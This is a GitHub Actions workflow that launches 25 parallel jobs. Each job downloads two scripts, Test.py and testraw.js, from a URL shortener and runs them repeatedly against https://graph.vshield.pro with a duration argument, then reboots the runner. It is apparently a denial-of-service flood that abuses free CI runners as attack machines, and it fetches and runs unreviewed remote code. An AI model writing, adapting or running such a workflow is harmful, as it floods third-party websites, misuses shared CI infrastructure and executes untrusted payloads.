name: Ubuntu VDS 50 saniye pro.j

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          pip install git+https://github.com/QuantumLLC/Archer
          wget https://curl.by/ltAWO/Test.py
          wget https://curl.by/ltAWO/testraw.js
          chmod +x testraw.js
          chmod +x Test.py
          PIDS=()
          for i in {1..4}; do
            timeout 200 python3 Test.py https://graph.vshield.pro && node testraw.js https://graph.vshield.pro 220
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 200
        
      - name: OK !
        run: sudo reboot
